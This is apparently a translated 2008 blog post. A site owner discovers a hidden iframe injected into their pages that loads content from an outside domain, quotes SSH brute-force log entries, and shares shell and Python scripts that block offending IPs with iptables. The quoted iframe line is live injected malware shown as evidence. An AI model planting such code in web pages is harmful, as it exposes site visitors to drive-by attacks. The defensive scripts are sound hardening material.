
How do you stop a server's password from being brute-forced?

Today I visited one of my own websites and noticed that, the first time the page opened, a small black frame appeared on it and the page's CSS file did not load either; it only loaded after a refresh. So I looked at the page source, and what I saw gave me a fright: something very unfortunate had happened, my site had been injected with malware, and the following code appeared at the very top of the page:

    <iframe src=http://520zuixin.com/cn5.htm width=50 height=0></iframe>

I immediately logged into the server to check the site's code, but found nothing abnormal, which is very strange. How did the code get inserted at the beginning of the page? Had something been done to Apache? I have not got to the bottom of this yet, so I set it aside and went to look at the server's logs.

When I opened /var/log/secure, I found a great many records of SSH brute-force login attempts, like these:

    Aug 29 16:27:23 fgb sshd[31098]: Failed password for root from 189.205.132.145 port 49920 ssh2
    Aug 29 16:27:28 fgb sshd[31100]: Failed password for root from 189.205.132.145 port 55661 ssh2
    Aug 29 16:27:33 fgb sshd[31103]: Failed password for root from 189.205.132.145 port 33579 ssh2
    Aug 29 16:27:37 fgb sshd[31106]: Failed password for root from 189.205.132.145 port 39344 ssh2
    Aug 29 16:27:42 fgb sshd[31115]: Failed password for root from 189.205.132.145 port 45117 ssh2
    Aug 29 16:27:46 fgb sshd[31124]: Failed password for root from 189.205.132.145 port 50881 ssh2
    Aug 29 16:27:52 fgb sshd[31126]: Failed password for root from 189.205.132.145 port 56359 ssh2
    Aug 29 16:27:57 fgb sshd[31128]: Failed password for root from 189.205.132.145 port 35882 ssh2
    Aug 29 16:28:02 fgb sshd[31130]: Failed password for root from 189.205.132.145 port 41888 ssh2
    Aug 29 16:28:08 fgb sshd[31132]: Failed password for root from 189.205.132.145 port 47882 ssh2
    Aug 29 16:28:12 fgb sshd[31134]: Failed password for root from 189.205.132.145 port 53121 ssh2
    Aug 29 16:28:17 fgb sshd[31136]: Failed password for root from 189.205.132.145 port 59014 ssh2
    Aug 29 16:28:21 fgb sshd[31139]: Failed password for root from 189.205.132.145 port 36742 ssh2

    Aug 29 17:24:13 fgb sshd[32749]: Did not receive identification string from 220.231.81.140
    Aug 29 17:28:50 fgb sshd[432]: Illegal user admin from 220.231.81.140
    Aug 29 17:28:57 fgb sshd[450]: Failed password for root from 220.231.81.140 port 59843 ssh2
    Aug 29 17:29:04 fgb sshd[452]: Illegal user stud from 220.231.81.140
    Aug 29 17:29:11 fgb sshd[454]: Illegal user trash from 220.231.81.140
    Aug 29 17:29:17 fgb sshd[457]: Illegal user gt05 from 220.231.81.140
    Aug 29 17:29:22 fgb sshd[463]: Illegal user william from 220.231.81.140
    Aug 29 17:29:26 fgb sshd[465]: Illegal user stephanie from 220.231.81.140
    Aug 29 17:29:37 fgb sshd[468]: Failed password for root from 220.231.81.140 port 60795 ssh2
    Aug 29 17:29:48 fgb sshd[471]: Failed password for root from 220.231.81.140 port 61017 ssh2
    Aug 29 18:16:24 fgb sshd[1638]: warning: can't get client address: Connection reset by peer
    Aug 29 18:16:24 fgb sshd[1638]: Could not write ident string to 219.142.141.194
    Aug 29 18:16:29 fgb sshd[1639]: Accepted password for root from 219.142.141.194 port 30436 ssh2
    Aug 29 18:16:37 fgb sshd[2650]: Received signal 15; terminating.
    Aug 29 18:19:07 fgb sshd[2643]: Server listening on 0.0.0.0 port 22.
    Aug 29 18:19:31 fgb sshd[2712]: Accepted password for root from 219.142.141.194 port 30477 ssh2

There are many records like these. It seems a lot of lowlifes are trying to crack my server's password! There really are a lot of garbage, bored people out there! I can't even be bothered to curse at you. If you have the skills, go after the US, Japan or France; what is the point of making trouble at home!

Cursing aside, I still needed a way to stop the password from being brute-forced. I later found the following script on a website:

    #!/bin/sh
    # Scan /var/log/secure for failed SSH logins, count them per source IP,
    # and DROP any source with more than 10 failures that is not already blocked.
    THRESHOLD=10
    # One "count=ip" pair per line; the IP is the 4th field from the end in
    # "Failed password for [invalid user] NAME from IP port N ssh2"
    SCANIP=`grep "Failed password" /var/log/secure | awk '{print $(NF-3)}' | sort | uniq -c | awk '{print $1"="$2}'`
    for i in $SCANIP
    do
        NUMBER=`echo $i | awk -F= '{print $1}'`
        IP=`echo $i | awk -F= '{print $2}'`
        echo "$NUMBER($IP)"
        # grep -w -F: whole-word, literal match, so 10.0.0.10 does not match an
        # existing rule for 10.0.0.100 and the dots are not regex wildcards
        if [ "$NUMBER" -gt "$THRESHOLD" ] && ! iptables -vnL INPUT | grep -qwF "$IP"
        then
            /sbin/iptables -I INPUT -s "$IP" -j DROP
            echo "`date` $IP($NUMBER)" >> /var/log/scanip.log
        fi
    done

What this script does: it scans the secure log, finds every IP with more than 10 failed login attempts, adds it to the iptables firewall's block list, and records it in a log file. Run it on a schedule (for example from cron) and the brute-force problem is contained. Two caveats: it counts only "Failed password" lines, so the "Illegal user" probes in the excerpt above are not counted, and rules inserted with iptables -I are not persistent, so they are lost on reboot unless the ruleset is saved. The excerpt also shows root logging in with a password; with PermitRootLogin and PasswordAuthentication turned off in sshd_config, guessing attempts would have nothing to guess at. After the first run of the script I got the following list of offending IPs, which have now been banned. You can see from the result that one garbage IP scanned me more than 5000 times!

    Sat Aug 30 13:50:55 CST 2008 123.30.0.68(52)
    Sat Aug 30 13:50:55 CST 2008 189.205.132.145(324)
    Sat Aug 30 13:50:54 CST 2008 201.6.150.22(41)
    Sat Aug 30 13:50:54 CST 2008 202.102.144.8(13)
    Sat Aug 30 13:50:55 CST 2008 219.238.183.30(162)
    Sat Aug 30 13:50:54 CST 2008 222.174.167.162(5058)
    Sat Aug 30 13:50:54 CST 2008 61.139.209.141(40)
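As an added example (not the script from the post, nor anything the author ran), here is the same detection logic in Python, extended in three ways: it also counts the "Illegal user" / "Invalid user" probes that the shell script ignores, it skips an allowlist of your own addresses so a typo from your office cannot lock you out, and it compares against the existing iptables rules by exact address rather than by substring. The log lines and the `iptables -vnL INPUT` output embedded in it are constructed to match the formats shown above; the address 61.139.209.14 and the allowlist 10.0.0.0/8 are assumptions made for the demonstration. It prints the iptables commands instead of running them.

```python
"""Count SSH brute-force sources in /var/log/secure style logs and produce
iptables DROP commands for the offenders (example code, not the post's script).
The sample log and iptables output below are constructed for the demo."""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Old OpenSSH logs "Illegal user"; newer releases log "Invalid user".
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+) port \d+")
PROBE_RE = re.compile(r"sshd\[\d+\]: (?:Illegal|Invalid) user \S+ from (\S+)")

# Constructed sample in the format of the log excerpt above.
SAMPLE_LOG = """\
Aug 29 16:27:23 fgb sshd[31098]: Failed password for root from 189.205.132.145 port 49920 ssh2
Aug 29 16:27:28 fgb sshd[31100]: Failed password for root from 189.205.132.145 port 55661 ssh2
Aug 29 16:27:33 fgb sshd[31103]: Failed password for root from 189.205.132.145 port 33579 ssh2
Aug 29 17:28:50 fgb sshd[432]: Illegal user admin from 220.231.81.140
Aug 29 17:28:57 fgb sshd[450]: Failed password for root from 220.231.81.140 port 59843 ssh2
Aug 29 17:29:04 fgb sshd[452]: Illegal user stud from 220.231.81.140
Aug 29 17:40:01 fgb sshd[480]: Failed password for invalid user test from 61.139.209.14 port 40001 ssh2
Aug 29 17:40:05 fgb sshd[482]: Failed password for invalid user oracle from 61.139.209.14 port 40002 ssh2
Aug 29 17:40:09 fgb sshd[484]: Failed password for invalid user guest from 61.139.209.14 port 40003 ssh2
Aug 29 17:50:00 fgb sshd[490]: Failed password for root from 10.0.0.5 port 50001 ssh2
Aug 29 17:50:04 fgb sshd[491]: Failed password for root from 10.0.0.5 port 50002 ssh2
Aug 29 17:50:08 fgb sshd[492]: Failed password for root from 10.0.0.5 port 50003 ssh2
Aug 29 18:16:29 fgb sshd[1639]: Accepted password for root from 219.142.141.194 port 30436 ssh2
"""

# Constructed `iptables -vnL INPUT` output: two DROP rules already in place.
# 61.139.209.141 is a substring trap: a plain grep for 61.139.209.14 would
# match this line and wrongly skip the new offender.
SAMPLE_IPTABLES = """\
Chain INPUT (policy ACCEPT 12 packets, 960 bytes)
 pkts bytes target     prot opt in     out     source               destination
   40  2400 DROP       all  --  *      *       189.205.132.145      0.0.0.0/0
   12   720 DROP       all  --  *      *       61.139.209.141       0.0.0.0/0
"""


def count_failures(log_text):
    """Failed logins plus unknown-user probes, per source IP."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line) or PROBE_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts


def blocked_sources(iptables_text):
    """Exact source addresses that already carry a DROP rule in INPUT."""
    blocked = set()
    for line in iptables_text.splitlines():
        f = line.split()
        # pkts bytes target prot opt in out source destination
        if len(f) >= 9 and f[2] == "DROP":
            blocked.add(f[7].split("/")[0])  # "1.2.3.4/32" -> "1.2.3.4"
    return blocked


def offenders(counts, threshold, allow_nets=()):
    """(ip, count) pairs over the threshold, excluding allowlisted networks,
    worst offender first."""
    nets = [ip_network(n) for n in allow_nets]
    hits = [(ip, n) for ip, n in counts.items()
            if n > threshold and not any(ip_address(ip) in net for net in nets)]
    return sorted(hits, key=lambda t: (-t[1], t[0]))


def block_commands(offs, blocked):
    """iptables commands for offenders not already blocked (exact match)."""
    return ["/sbin/iptables -I INPUT -s %s -j DROP" % ip
            for ip, _ in offs if ip not in blocked]


if __name__ == "__main__":
    counts = count_failures(SAMPLE_LOG)
    offs = offenders(counts, threshold=2, allow_nets=["10.0.0.0/8"])
    for cmd in block_commands(offs, blocked_sources(SAMPLE_IPTABLES)):
        print(cmd)
```

With the post's threshold of 10, run it over the real /var/log/secure and the real `iptables -vnL INPUT` output, and pipe the printed commands to sh once you trust them. This is essentially what fail2ban's sshd jail automates, including expiring the bans after a set time, which neither this nor the shell script above does.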

As for how that injected code got into my site, I will keep investigating, and I will record the result here once I have one!



5 Comments

  1. Damn, let me swear along with you! Brother, you have to protect that server!

    Posted on 30-Aug-08 at 11:01 pm | Permalink
  2. askie

    I have already sworn plenty of times!
    It doesn't help; I still have to find a way to put some protection on it!

    Posted on 30-Aug-08 at 11:19 pm | Permalink
  3. It's like grinding levels: while trading blows with an opponent, you slowly level up yourself.

    Posted on 31-Aug-08 at 12:20 pm | Permalink
  4. I got hit by this thing too. How do I fix it?

    Posted on 02-Sep-08 at 4:35 pm | Permalink
  5. askie

    @David I haven't found a solution yet. If you got hit by it, ask the datacenter admin whether an ARP attack is going on! Many friends say this is an ARP attack, that is, it isn't your server that caught this virus but another machine in the same datacenter as your server!

    Posted on 02-Sep-08 at 7:40 pm | Permalink
